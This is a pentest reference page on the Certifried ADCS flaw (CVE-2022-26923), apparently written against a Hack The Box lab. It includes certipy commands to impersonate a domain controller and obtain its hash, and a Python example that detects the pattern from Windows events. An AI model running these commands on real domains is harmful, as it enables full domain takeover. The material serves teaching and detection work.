## Overview

Certifried, or CVE-2022-26923, is a vulnerability in ADCS (Active Directory Certificate Services) that allows a user to impersonate a domain controller.

Due to an issue with how ADCS handles uniqueness of DNS hostnames, you can create a machine account with the same DNS hostname as the domain controller. That hostname is used for authentication when a machine account enrolls with the Machine template, which allows the impersonation. DNS hostnames are normally checked for uniqueness against the SPN (Service Principal Name), but clearing the SPN breaks this check.
## Discovery

Requirements:

- A user on the domain
- The ability to add a machine account to the domain (check the MAQ, the MachineAccountQuota)
- An unpatched system (Certifried was patched in 2022)

Run the following check in certipy to see if the host is vulnerable:

```
certipy req -u "[USERNAME]@[DOMAIN]" -p "[PASSWORD]" -dc-ip "[IP]" -target "$ADCS_HOST" -ca 'ca_name' -template 'User'
```

If the output isn't `Certificate object SID is [...]`, the host is vulnerable.

If you need the CA name for the above check, try the following:

```
certipy-ad find -dc-ip [IP] -dc-only -u "[USER]@[DOMAIN]" -p '[PASSWORD]'
```
## Exploitation

If the check works and the host appears to be vulnerable, you'll need to create a new machine account impersonating the domain controller, and then authenticate to get its hash.

```
# make a machine account and impersonate the DC
certipy-ad account create -u "[USERNAME]@[DOMAIN]" -p '[PASSWORD]' -user "[MACHINE ACCOUNT NAME]" -pass 'Password123!' -dns "[DC DNS HOSTNAME]" -dc-ip [IP]

# Request a certificate for the newly created machine account
certipy-ad req -u '[MACHINE ACCOUNT NAME]$'@"[DOMAIN]" -p 'Password123!' -dc-ip [IP] -target "dc.certifried.htb" -ca 'certifried-DC-CA' -template 'Machine'

# Authenticate with the certificate to get the hash of the DC
certipy-ad auth -pfx ./dc.pfx -dc-ip 10.129.227.189 -domain 'certifried.htb'
```

If you receive the error `KDC_ERR_PADATA_TYPE_NOSUPP (KDC has no support for padata type)` when authenticating, try running `gpupdate /force` on the machine and then try again.
## Post-Exploitation

Use the obtained hash of the domain controller to perform a DCSync attack.
## Detection & Evasion

Event 4887 (Certificate Services approved a certificate request and issued a certificate) is generated when the certificate is issued, and event 4741(S) (A computer account was created) is generated when the machine account is added.
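The two events above are only useful to a defender when they are correlated: a 4741 on its own is routine, and a 4887 for the Machine template is routine, but a computer account created with a domain controller's DNS hostname that then obtains a Machine certificate is the Certifried pattern. The following is an added example (not part of the original writeup, and not certipy or Microsoft code) that runs that correlation over constructed sample records. The event dictionaries use simplified field names rather than a verbatim EVTX export, and the `KNOWN_DC_HOSTNAMES` set is an assumption standing in for the defender's own inventory.

```python
# Added detection example: correlate Security events 4741 and 4887 to flag a
# computer account created with a DC's dNSHostName that later obtains a
# Machine-template certificate. Sample data below is constructed.

# Assumption for this example: the defender maintains the DC DNS hostnames.
KNOWN_DC_HOSTNAMES = {"dc.certifried.htb"}

# Constructed sample events (simplified field names, not a verbatim EVTX/JSON export).
SAMPLE_EVENTS = [
    {"EventID": 4741, "SubjectUserName": "lowpriv", "TargetUserName": "EVIL$",
     "DnsHostName": "dc.certifried.htb", "ServicePrincipalNames": "-"},
    {"EventID": 4741, "SubjectUserName": "itadmin", "TargetUserName": "WS01$",
     "DnsHostName": "ws01.certifried.htb",
     "ServicePrincipalNames": "HOST/ws01.certifried.htb, RestrictedKrbHost/ws01.certifried.htb"},
    {"EventID": 4887, "Requester": "CERTIFRIED\\EVIL$", "Template": "Machine",
     "Subject": "CN=dc.certifried.htb", "RequestId": 42},
    {"EventID": 4887, "Requester": "CERTIFRIED\\WS01$", "Template": "Machine",
     "Subject": "CN=ws01.certifried.htb", "RequestId": 43},
]


def dc_hostname_collisions(events, dc_hostnames=KNOWN_DC_HOSTNAMES):
    """Return {SAM name: 4741 event} for computer accounts whose dNSHostName
    at creation equals a known domain controller hostname."""
    wanted = {h.lower() for h in dc_hostnames}
    hits = {}
    for ev in events:
        if ev.get("EventID") != 4741:
            continue
        if ev.get("DnsHostName", "").lower() in wanted:
            hits[ev["TargetUserName"].upper()] = ev
    return hits


def _requester_sam(requester):
    """'DOMAIN\\NAME$' -> 'NAME$' (a bare name is returned unchanged, upper-cased)."""
    return requester.rsplit("\\", 1)[-1].upper()


def correlate(events, dc_hostnames=KNOWN_DC_HOSTNAMES):
    """Pair each colliding 4741 with a 4887 Machine-template issuance requested
    by the same account. Order of events does not matter: creations are
    collected first, then issuances are matched against them."""
    suspects = dc_hostname_collisions(events, dc_hostnames)
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4887 or ev.get("Template") != "Machine":
            continue
        sam = _requester_sam(ev.get("Requester", ""))
        if sam in suspects:
            alerts.append({
                "account": sam,
                "created_by": suspects[sam]["SubjectUserName"],
                "impersonated_host": suspects[sam]["DnsHostName"],
                "request_id": ev.get("RequestId"),
                "subject": ev.get("Subject"),
            })
    return alerts


if __name__ == "__main__":
    for a in correlate(SAMPLE_EVENTS):
        print(f"ALERT: {a['account']} (created by {a['created_by']}) was issued "
              f"request {a['request_id']} for {a['impersonated_host']}")
```

On the sample data only `EVIL$` is flagged: it was created with the DC's hostname and then received a Machine certificate, while `WS01$` has its own hostname and is ignored. Two caveats for a production rule: the dNSHostName can also be set on an existing account after creation (event 4742, "A computer account was changed"), which this example does not inspect, and the account's empty SPN list in the 4741 record is a second signal worth alerting on in its own right, since the writeup's bypass depends on clearing it.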
## Resources

| Hyperlink | Info |
|---|---|
| The Hacker Recipes | Certifried Writeup |
| Hack The Box | Certifried Writeup |
| Semperis | Certifried Writeup |